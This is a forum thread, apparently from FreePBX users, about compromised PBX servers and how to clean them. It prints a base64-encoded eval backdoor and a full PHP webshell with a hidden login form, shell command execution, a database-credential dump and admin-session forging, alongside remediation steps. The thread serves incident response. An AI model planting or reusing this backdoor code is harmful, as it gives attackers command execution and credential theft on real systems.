Yesterday and today I received an email informing me about tampered file warnings.
Yesterday:
You have 1 tampered files:
Module: “FreePBX Framework”, File: “/var/www/html/admin/libraries/media/Media/Media.php altered”
Today:
You have 1 tampered files:
Module: “FreePBX Framework”, File: “/var/www/html/admin/ajax.php altered”
In today's reported file I might have discovered something suspicious right after the start:
// License for all code of this FreePBX module can be found in the license file inside the module directory
// Copyright 2013 Schmooze Com Inc.
eval(base64_decode('c2Vzc2lvbl9zdGFydCgpO2lmKCFpc3NldCgkX1NFU1NJT05bJ0FNUF91c2VyJ10pKXtpZihtZDUoJF9SRVFVRVNUWydwd2R6J10pID09ICdlYzAwOWVlZTY2NjJhNDlkNjBmNDRiNGE5MTk4ZmExZCcpe3NoZWxsX2V4ZWMoJF9QT1NUWydjJ10pO31lY2hvICd7ImVycm9yIjoiYWpheFJlcXVlc3QgIGRlY2xpbmVkIn0nO2V4aXQoKTt9'));
I found that the file /etc/asterisk/extensions_custom.conf was adjusted with this content.
You should delete the last lines in this file, or delete the complete extensions_custom.conf if it is the default one. Done in the CLI.
After an ‘amportal a r’ the file is recreated with the default (empty) FreePBX settings.
I just set up a new server with the current FreePBX Distro yesterday.
For the sake of simplicity I used Backup and Restore to save the config on the old machine and restore it on the new machine.
Unfortunately, right as I logged in on the new machine this morning I got a new warning:
Module: “FreePBX Framework”, File: “/var/www/html/admin/views/header.php altered”
Inside the file I again have some base64-encoded code which to me seems to be a hacker's code that creates a secret login form to get access to my FreePBX:
/*atjswjI9KYdoyxgtYaKqLN5IhSaXIJISd1kJk3T416tADK4CUP2GC7oU0yRIizBvAWfVZ801ftBTdFv8v*/
session_start();
// Password gate: the md5 of the "p" parameter has to match the attacker's hash
if (isset($_REQUEST['p']) && md5($_REQUEST['p']) == '526efc7d64f9fc115a33c5dda9d926eb') {
    $_SESSION['zoz'] = 'logged';
}
// Until that gate is passed, every visitor only gets the hidden login form
if (!isset($_SESSION['zoz'])) {
    echo '<form action = "" method = "post" >Pokemon<input size = 60 type = text name = "p" /><input type = submit value = "BonBon" /></form><!-- /*[IP of old FreePBX-Machine]*/ (Pokemon)(BonBon)-->';exit();
}
/*huu6t9ptnNrpbmpzfBrITZqNoURpgNixhMELV4eiSGI427DiI40B4rotlgSB3b9lXO6TTlbL2UQ51tnKynmDPL6a1Z*/
// Once logged in: command form, dumps the DB credentials, then runs "c" as a shell command
if (isset($_SESSION['zoz']) && $_SESSION['zoz'] == 'logged') {
    echo '<form action = "" method = "post" ><input size = 60 type = text name = "c" /><input type = submit value = "do" /></form>';
    echo "<xmp>";
    @system("grep AMPDB /etc/amportal.conf");
    echo "---------------------\n";
    @system($_REQUEST['c']);
    echo "</xmp>";
    // "?admin=a": forge an admin FreePBX session and jump straight into the GUI
    if(isset($_REQUEST['admin'])){
        if (!@include_once(getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
            include_once('/etc/asterisk/freepbx.conf');
        }
        require_once(dirname(__FILE__) . '/../ampuser.class.php');
        $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
        $_SESSION['AMP_user']->setAdmin();
        header("Location: /admin/config.php");
    }
    echo '<a href="?admin=a" >Admin GO</a>';
}
/*O7Gc2HLUq3t1y4XOZWX0Yctz6HfBPKaDSRQVyBPYFj0enX2nUZnSbRshyITot41mV*/
So I assume there are quite some problems if the new machine was hacked too.
Even though I have set “Web Management (Secure)” to internal in the firewall on the new machine, which I previously had wrongly set to external on the old machine.
Could the hack of the new machine have benefited from my Backup and Restore transfer (i.e. I backed up and restored the hack to the new machine)?
This base64-encoded text translates to the above-mentioned code. The code, as far as I understand, should load a secret admin login form used by some hacker to get into your FreePBX machine.
After you did your backup and restore, did you update your machine? If you do a backup and have it include the modules, it would bring over any of the hacks from your old system. When doing a backup and restore, make sure you pick config only and not the full backup, as a full backup will also include all of your module directory.
I know that we can delete a /var/www/html/admin/module directory and after that reinstall it with ‘amportal && fwconsole a ma download/install xxxx’.
But is there a way to delete the whole admin web directory and reinstall it again from source? Or is it only possible to reinstall the web directories with ‘install_amp’?
Just looking for a quick and clean way to renew all infected PBX files in the web directories.
That’s annoyingly difficult. But we DO have a little script that you can run to do an integrity validation, without depending on the (potentially hacked) inbuilt validator.
That will then display anything suspicious it finds.
Edit: Note that you can run ‘fwconsole --edge ma downloadinstall framework’, which will get Framework build 185, which automatically cleans up any potential ‘extra’ files that it finds.
In the config update “mysql-2.sql” file I have discovered some database entries including a base64_decode; I assume that this is why the new machine also ended up with an infected file:
I am looking into this. I do not know if it has to do with the weatherzip, but I think you can delete it. Not sure yet.
Deleting this row can be done in MySQL (from the CLI):
mysql
use asterisk;
select * from cronmanager;
delete from cronmanager where module = 'weatherzipc';
quit;
I’m noticing the same thing on a few PBXes of mine this morning. Different tampered file, /var/www/html/admin/libraries/BMO/Ajax.class.php, and weird “session_start()” / “eval(base64” code inserted.
However, I was already running FreePBX Framework 13.0.182.
I saw where invalid calls were attempted and logged by my SIP trunk provider, but not in the FreePBX CDR:
sip:810201100022435
sip:010201100022435
sip:001201100022435
sip:000201100022435
sip:00201100022435
I ran:
fwconsole chown
fwconsole ma refreshsignatures
fwconsole reload
and that removed the strange code… but I’m concerned.
Am I safe now and just monitor for any other modified files… or should I look elsewhere?
We’re going to push .186 to stable shortly, which will block and clean up all of these. In the interim, you can run ‘fwconsole --edge ma downloadinstall framework’ to get it now.
I’ve just installed .188 and restarted Asterisk, but the malicious content of the cronmanager table under the module name weatherzipc was not deleted.
I’ll have to do that manually.